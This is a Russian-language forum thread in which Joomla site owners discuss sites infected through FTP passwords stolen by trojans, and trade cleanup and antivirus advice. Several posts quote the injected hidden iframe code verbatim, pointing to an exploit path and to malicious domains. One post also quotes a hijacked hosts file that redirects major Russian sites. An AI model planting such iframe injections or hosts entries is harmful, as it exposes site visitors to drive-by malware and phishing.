Взломали сайт! - Безопасность сайтов на Joomla

Вчера зайдя на свой сайт увидел интересную картину, а выглядит она так:

После всевозможных попыток это исправить самостоятельно, я обратился к моему хостеру, от которого получил ответ, что мой сайт взломали!
Сталкивался кто-нибудь с подобной проблемой, помогите решить эту проблеу!

Ну адрес бы точно не помешал...

Так это же защищенное соединение SSL, может ты установил зашифрованное соединение?

Во первых, на форуме запрещено выделять весь текст жирным шрифтом, во вторых, посмотрите конфигурационный файл, все ли там чисто и, обязательно, .htaccess (возможно там есть строчка DirectoryIndex и переход на др. сайт), в третьих, посмотрите код index.php своего шаблона, нет ли там лишних скриптов? Ну и таким образом, последовательно двигаясь, удастся локализовать проблему и заняться её устранением.

Во первых, на форуме запрещено выделять весь текст жирным шрифтом, во вторых, посмотрите конфигурационный файл, все ли там чисто и, обязательно, .htaccess (возможно там есть строчка DirectoryIndex и переход на др. сайт), в третьих, посмотрите код index.php своего шаблона, нет ли там лишних скриптов? Ну и таким образом, последовательно двигаясь, удастся локализовать проблему и заняться её устранением.

Дело в том, что всё вышеприведённое я уже сделал, не помогает, сейчас общаюсь с хостером по этому поводу!

Так это же защищенное соединение SSL, может ты установил зашифрованное соединение?

Нет исключено, я настройки не менял никакие, всё прекрасно работало до вчерашнего дня!

Обнаружил в папках сайта файлы index.htm с подозрительными значениями:
<iframe src="https://87.242.115.19/exp/" width="0" height="0" style="display:none;"></iframe>
Сейчас занимаюсь чисткой, о результатах отпишусь!

Вообщем проблема оказалась в этом коде:
<iframe src="https://87.242.115.19/exp/" width="0" height="0" style="display:none;"></iframe>
Как я заметил он присутствовал в файлах index.htm, но и может быть прописан в файлах index.php в последней строке!

так же и default.php тоже заражаются.

можешь сказать - что за хостер и откуда вирус?
с флэшки?

просто специальными программами сравните свой дистрибутив с оригинальным - так найдете все изменения до единого файла

Добрый день у меня такая же беда случилась две недели назад. В index.html прописалось вот это <iframe src="http://u5l.ru:8080/index.php" width=171 height=137 style="visibility: hidden"></iframe>. Также, потом в конце файлов php стала дописываться эта гадость. Я снёс сайт, так как вычистить не хватило терпения, позавчера установил сайт с нуля как говориться, закрыл его, и стал настраивать, сегодня в обед заметил, что не открывается главная старница. Помотрел - а там уже <html><body bgcolor="#FFFFFF"><iframe src="http://u6x.ru:8080/index.php" width=142 height=129 style="visibility: hidden"></iframe></body></html><iframe src="http://asfirey.net/?click=988AE7" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>. Разрешения файлов стоят 644. Пароли - поменял. 2 дня продержалось и сдохло. Почему?

Добрый день у меня такая же беда случилась две недели назад. В index.html прописалось вот это <iframe src="http://u5l.ru:8080/index.php" width=171 height=137 style="visibility: hidden"></iframe>. Также, потом в конце файлов php стала дописываться эта гадость. Я снёс сайт, так как вычистить не хватило терпения, позавчера установил сайт с нуля как говориться, закрыл его, и стал настраивать, сегодня в обед заметил, что не открывается главная старница. Помотрел - а там уже <html><body bgcolor="#FFFFFF"><iframe src="http://u6x.ru:8080/index.php" width=142 height=129 style="visibility: hidden"></iframe></body></html><iframe src="http://asfirey.net/?click=988AE7" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>. Разрешения файлов стоят 644. Пароли - поменял. 2 дня продержалось и сдохло. Почему?

Потому что на компе вирус!!! Сто раз об этом говорилось - свою машину лечить надо

объясняю ситуацию - ТЫ заразился трипаком - и заражаешь свою подругу - потом идёшь и ЕЁ лечишь, Через два дня прибегаешь к доктору и ругаешься почему это она опять трипаком заболела? вроде на цепи её дома держал и никто не мог принести его в дом

можешь сказать - что за хостер и откуда вирус?
с флэшки?

Хостер всем известный РБК! Вирус точно сказать не могу откуда, но вполне может быть, то что он залез через FTP! Так бывает чаще всего, хотя самое странное, что до вчерашнего дня у меня на компе ничего не обнаруживалось, но потом стали предупреждения вылезать! Хотя возможно что сам вирус ко мне попал на комп, когда, кто-то из моей семьи сидел за ним и лазил, где не стоит!
С флэшкой вариант тоже рассматривается! тут не угадаешь!

Добрый день у меня такая же беда случилась две недели назад. В index.html прописалось вот это <iframe src="http://u5l.ru:8080/index.php" width=171 height=137 style="visibility: hidden"></iframe>. Также, потом в конце файлов php стала дописываться эта гадость. Я снёс сайт, так как вычистить не хватило терпения, позавчера установил сайт с нуля как говориться, закрыл его, и стал настраивать, сегодня в обед заметил, что не открывается главная старница. Помотрел - а там уже <html><body bgcolor="#FFFFFF"><iframe src="http://u6x.ru:8080/index.php" width=142 height=129 style="visibility: hidden"></iframe></body></html><iframe src="http://asfirey.net/?click=988AE7" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>. Разрешения файлов стоят 644. Пароли - поменял. 2 дня продержалось и сдохло. Почему?

Возможно дело в твоей системе, может быть какой-нибудь вирус!

Когда занимался ипсравлением сайта, дабы выявить все проблемы я ещё проверил файл hosts который находится C:\WINDOWS\system32\drivers\etc и там было обнаружено следующее:
91.189.113.143 mail.ru
91.189.113.143 www.mail.ru
91.189.113.143 www.yandex.ru
91.189.113.143 yandex.ru
91.189.113.143 www.vkontakte.ru
91.189.113.143 vkontakte.ru
91.189.113.143 www.odnoklasniki.ru
91.189.113.143 odnoklasniki.ru
Так что проверьте его тоже!
 

просто специальными программами сравните свой дистрибутив с оригинальным - так найдете все изменения до единого файла

А ты не подскажешь, как называются эти программы?

Возможно дело в твоей системе, может быть какой-нибудь вирус!

А каким антивирусом проверять? У меня стоит DrWEB в связке с Outpostom/ обновляю каждый час. Где искать вирус?

morpheus, попробуй Dr.Web CureIt! http://www.freedrweb.com/download+cureit/
Он всё отыскал у меня на компьютере, теперь спокойно работаю"!

А каким антивирусом проверять? У меня стоит DrWEB в связке с Outpostom/ обновляю каждый час. Где искать вирус?

Если машина уже заражена можно прогнать AVZ либо свежим CureIt в режиме из-под другой ОС - например из под Win PE 

Если машина уже заражена

Коды ворует троян, если он китаец сносить придется все

Коды ворует троян, если он китаец сносить придется все

в курсе что такое руткит? перехваты функций? запуск в нулевом кольце? нет?
Тогда открою секрет что сносить все - это вариант когда нельзя победить вирус (процента 2 отвсех вирусов - и они обычно не воруют пароли)

в курсе что такое руткит?

В курсе. Есть разница между "сайт сломали" и " прихватил вирус".

ой, я смотрю тут все специалисты по безопасности и просто злобные хаЦкеры, словами страшными перематюговываются

В курсе. Есть разница между "сайт сломали" и " прихватил вирус".

В данном случае не сломали сайт - а тупо украден пароль на ftp. И лечить надо причину

В данном случае не сломали сайт - а тупо украден пароль на ftp. И лечить надо причину

Уже всё исправлено и выличено!  Будем надеятся, что дальше такого не произойдёт! Но для большей безопасности придётся переустанавливать систему!

Спасибо, Народ! Щас сканю ящик свой, нашёл 3 трояна. Поменяю пароль на фтп. посмотрим что получится.

Самое странное, что NOD32 даже не заметил ничего!

нашёл 3 трояна.

Кто-то говорил про перехват?